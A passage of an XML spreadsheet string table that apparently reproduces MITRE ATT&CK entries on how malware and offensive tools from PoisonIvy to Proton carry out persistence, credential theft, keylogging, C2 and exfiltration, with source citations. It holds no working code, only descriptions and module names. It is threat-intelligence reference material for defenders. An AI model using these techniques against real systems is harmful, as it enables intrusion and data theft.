    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) contains a keylogger.(Citation: FireEye Poison Ivy)(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) stages collected data in a text file.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a Registry subkey that registers a new system device.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) hides any strings related to its own indicators of compromise.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates run key Registry entries pointing to a malicious executable dropped to disk.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) starts a rootkit from a malicious file dropped to disk.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) uses the Camellia cipher to encrypt communications.(Citation: FireEye Poison Ivy)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a backdoor through which remote attackers can open a command-line interface.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a Registry subkey that registers a new service. [PoisonIvy](https://attack.mitre.org/software/S0012) also creates a Registry entry modifying the Logical Disk Manager service to point to a malicious DLL dropped to disk.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can use Twitter, Reddit, Imgur and other websites to get a C2 URL.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can use a custom algorithm to decrypt strings used by the malware.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can retrieve payloads from the C2 server.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can write encrypted JSON configuration files to the Registry.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can use &lt;code&gt;LoadLibraryW&lt;/code&gt; and &lt;code&gt;CreateProcess&lt;/code&gt; to load and execute code.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can custom encrypt strings.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can be executed using rundll32.exe.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can use steganography to hide C2 information in images.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) has has used HTTP GET requests in C2 communications.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has used scripts to delete itself after execution.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) can download additional files onto the infected system.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has used the &lt;code&gt;NetUserEnum&lt;/code&gt; function to enumerate local accounts.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has attempted to lure targets into downloading an attached executable (ZIP, RAR, or CAB archives) or document (PDF or other MS Office format).(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has attempted to lure targets into clicking links in spoofed emails from legitimate banks.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has used the Adobe Reader icon for the downloaded file to look more trustworthy.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has used several Windows functions for various purposes.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) attachments have been delivered via compressed archive files. [Pony](https://attack.mitre.org/software/S0453) also obfuscates the memory flow by adding junk instructions when executing to make analysis more difficult.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has used a small dictionary of common passwords against a collected list of local accounts.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has been delivered via spearphishing attachments.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has been delivered via spearphishing emails which contained malicious links.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has collected the Service Pack, language, and region information to send to the C2.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has delayed execution using a built-in function to avoid detection and analysis.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has sent collected information to the C2 via HTTP POST request.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has used batch scripts to delete itself after execution.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can use Invoke-TokenManipulation for manipulating tokens.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains a module for compressing data using ZIP.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains a module for recursively parsing through files and directories to gather valid credit card numbers.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has modules for brute forcing local administrator and AD user accounts.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can utilize multiple methods to bypass UAC.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can use Invoke-RunAs to make tokens.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains modules for searching for passwords in local and remote files.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can enumerate local and domain user account information.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has modules for enumerating domain trusts.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains modules for local privilege escalation exploits such as CVE-2016-9192 and CVE-2016-0099.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains a module for exploiting SMB via EternalBlue.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can enumerate files on the local file system and includes a module for enumerating recently accessed files.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has modules for keystroke logging and capturing credentials from spoofed Outlook authentication messages.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can use Inveigh to conduct name service poisoning for credential theft and associated relay attacks.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains an implementation of [Mimikatz](https://attack.mitre.org/software/S0002) to gather credentials from memory.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains modules, such as &lt;code&gt;Get-LocAdm&lt;/code&gt; for enumerating permission groups.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can perform port scans from an infected host.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains a module for taking packet captures on compromised hosts.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has a number of modules that leverage pass the hash for lateral movement.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can use &lt;code&gt;Get-PassPol&lt;/code&gt; to enumerate the domain password policy.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains multiple modules for injecting into processes, such as &lt;code&gt;Invoke-PSInject&lt;/code&gt;.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains modules that allow for use of proxies in command and control.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains an implementation of [PsExec](https://attack.mitre.org/software/S0029) for remote execution.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains modules, such as &lt;code&gt;Get-ComputerInfo&lt;/code&gt;, for enumerating common system information.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can enumerate network adapter information.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains an implementation of [netstat](https://attack.mitre.org/software/S0104) to enumerate TCP and UDP connections.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can enumerate service and service permission information.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can use protocols like HTTP/HTTPS for command and control traffic.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has a number of modules that use WMI to execute tasks.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has the ability to persist on a system using WMI events.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[Power Loader](https://attack.mitre.org/software/S0177) overwrites Explorer’s Shell_TrayWnd extra window memory to redirect execution to a NTDLL function that is abused to assemble and execute a return-oriented programming (ROP) chain and create a malicious thread within Explorer.exe.(Citation: MalwareTech Power Loader Aug 2013)(Citation: WeLiveSecurity Gapz and Redyms Mar 2013)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has a command to get text of the current foreground window.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has a command to write random data across a file and delete it.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has commands to get the current directory name as well as the size of a file. It also has commands to obtain information about logical drives, drive type, and free space.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has a command to download a file.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) hides many of its backdoor payloads in an alternate data stream (ADS).(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has a command to list the victim's processes.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) achieves persistence by using various Registry Run keys.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) uses rundll32.exe to load.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[PowerDuke](https://attack.mitre.org/software/S0139) uses steganography to hide backdoors in PNG files, which are also encrypted using the Tiny Encryption Algorithm (TEA).(Citation: Volexity PowerDuke November 2016) </t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has commands to get information about the victim's name, build, version, serial number, and memory usage.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has a command to get the victim's domain and NetBIOS name.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has commands to get the current user's name and SID.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has commands to get the time the machine was built, the time, and the time zone.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) runs &lt;code&gt;cmd.exe /c&lt;/code&gt; and sends the output to its C2.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has used 7Zip to compress .txt, .pdf, .xls or .doc files prior to exfiltration.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has used a PowerShell document stealer module to pack and exfiltrate .txt, .pdf, .xls or .doc files smaller than 5MB that were modified during the past two days.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to remove all files created during the dropper process.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has added a registry key so future powershell.exe instances are spawned with coordinates for a window position off-screen by default.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has added a registry key so future powershell.exe instances are spawned off-screen by default, and has removed all registry entries that are left behind during the dropper process.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) is a backdoor written in PowerShell.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to deploy a reconnaissance module to retrieve a list of the active processes.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) sets up persistence with a Registry run key.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to encode C2 communications with base64 encoding.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has collected system information on the infected host.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to identify the current Windows domain of the infected host.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to identify the current user on the infected host.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to save and execute VBScript.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has sent HTTP GET and POST requests to C2 servers to send information and receive instructions.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-TokenManipulation&lt;/code&gt; Exfiltration module can be used to manipulate tokens.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-MicrophoneAudio&lt;/code&gt; Exfiltration module can record system microphone audio.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) has several modules that search the Windows Registry for stored credentials: &lt;code&gt;Get-UnattendedInstallFile&lt;/code&gt;, &lt;code&gt;Get-Webconfig&lt;/code&gt;, &lt;code&gt;Get-ApplicationHost&lt;/code&gt;, &lt;code&gt;Get-SiteListPassword&lt;/code&gt;, &lt;code&gt;Get-CachedGPPPassword&lt;/code&gt;, and &lt;code&gt;Get-RegistryAutoLogon&lt;/code&gt;.(Citation: Pentestlab Stored Credentials)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and exploit DLL hijacking opportunities in services and processes.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Exfiltration modules that can access data from local files, volumes, and processes.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) has modules such as &lt;code&gt;Get-NetDomainTrust&lt;/code&gt; and &lt;code&gt;Get-NetForestTrust&lt;/code&gt; to enumerate domain and forest trusts.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of CodeExecution modules that inject code (DLL, shellcode) into a process.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>Group Policy Preferences</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Exfiltration modules that can harvest credentials from Group Policy Preferences.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Find-AVSignature&lt;/code&gt; AntivirusBypass module can be used to locate single byte anti-virus signatures.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-Kerberoast&lt;/code&gt; module can request service tickets and return crackable ticket hashes.(Citation: PowerSploit Invoke Kerberoast)(Citation: Harmj0y Kerberoast Nov 2016)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-Keystrokes&lt;/code&gt; Exfiltration module can log keystrokes.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Exfiltration modules that can harvest credentials using [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-ProcessTokenGroup&lt;/code&gt; Privesc-PowerUp module can enumerate all SIDs associated with its current token.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of ScriptModification modules that compress and encode scripts and payloads.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and exploit path interception opportunities in the PATH environment variable.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and exploit search order hijacking vulnerabilities.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and exploit unquoted path vulnerabilities.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) reflectively loads a Windows PE file into a process.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) modules are written in and executed via [PowerShell](https://attack.mitre.org/techniques/T1086).(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-ProcessTokenPrivilege&lt;/code&gt; Privesc-PowerUp module can enumerate privileges for a given process.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can query Registry keys for potential opportunities.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;New-UserPersistenceOption&lt;/code&gt; Persistence argument can be used to establish via the &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;New-UserPersistenceOption&lt;/code&gt; Persistence argument can be used to establish via a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053).(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-TimedScreenshot&lt;/code&gt; Exfiltration module can take screenshots at regular intervals.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Install-SSP&lt;/code&gt; Persistence module can be used to establish by installing a SSP DLL.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Exfiltration modules that can harvest credentials from Windows vault credential objects.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-WmiCommand&lt;/code&gt; CodeExecution module uses WMI to execute and retrieve the output from a [PowerShell](https://attack.mitre.org/techniques/T1086) payload.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and replace/modify service binaries, paths, and configs.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) uses Microsoft OneDrive as a C2 server via a network drive mapped with &lt;code&gt;net use&lt;/code&gt;.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) uses a XOR cipher to encrypt command output written to its OneDrive C2 server.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) uses PowerShell loops to iteratively check for available commands in its OneDrive C2 server.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) has been used to monitor process lists.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) modifies the MAC times of its local log files to match that of the victim's desktop.ini file.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>After collecting documents from removable media, [Prikormka](https://attack.mitre.org/software/S0113) compresses the collected files, and encrypts it with Blowfish.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects passwords stored in applications installed on the victim.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) gathers logins and passwords stored in applications on the victims, including Google Chrome, Mozilla Firefox, and several other browsers.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) uses DLL search order hijacking for persistence by saving itself as ntshrui.dll to the Windows directory so it will load before the legitimate ntshrui.dll saved in the System32 subdirectory.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) contains a module that collects documents with certain extensions from removable media or fixed drives connected via USB.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information about the paths, size, and creation time of files with specific file extensions, but not the actual content of the file.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>After encrypting its own log files, the log encryption module in [Prikormka](https://attack.mitre.org/software/S0113) deletes the original, unencrypted files from the host.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) contains a keylogger module that collects keystrokes and the titles of foreground windows.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) creates a directory, &lt;code&gt;%USERPROFILE%\AppData\Local\SKC\&lt;/code&gt;, which is used to store collected log files.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>Some resources in [Prikormka](https://attack.mitre.org/software/S0113) are encrypted with a simple XOR operation or encoded with Base64.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information on available printers and disk drives.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) adds itself to a Registry Run key with the name guidVGA or guidVSA.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) uses rundll32.exe to load its DLL.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) contains a module that captures screenshots of the victim's desktop.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information from the victim about installed anti-virus software.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) encodes C2 traffic with Base64.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) encrypts some C2 traffic with the Blowfish cipher.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information from the victim about Windows OS version, computer name, battery info, and physical memory.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information from the victim about its IP addresses and MAC addresses.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information from the victim about the current user name.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) zips up files before exfiltrating them.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>Clear Linux or Mac System Logs</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) removes logs from &lt;code&gt;/var/logs&lt;/code&gt; and &lt;code&gt;/Library/logs&lt;/code&gt;.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) gathers credentials for Google Chrome.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) uses an encrypted file to store commands and configuration values.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) kills security tools like Wireshark that are running.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) removes all files in the /tmp directory.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) prompts users for their credentials.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) gathers credentials in files for keychains.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) uses a keylogger to capture keystrokes.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) persists via Launch Agent.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>Password Managers</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) gathers credentials in files for 1password.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) captures the content of the desktop with the screencapture binary.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>Sudo and Sudo Caching</t>
  </si>
  <si>
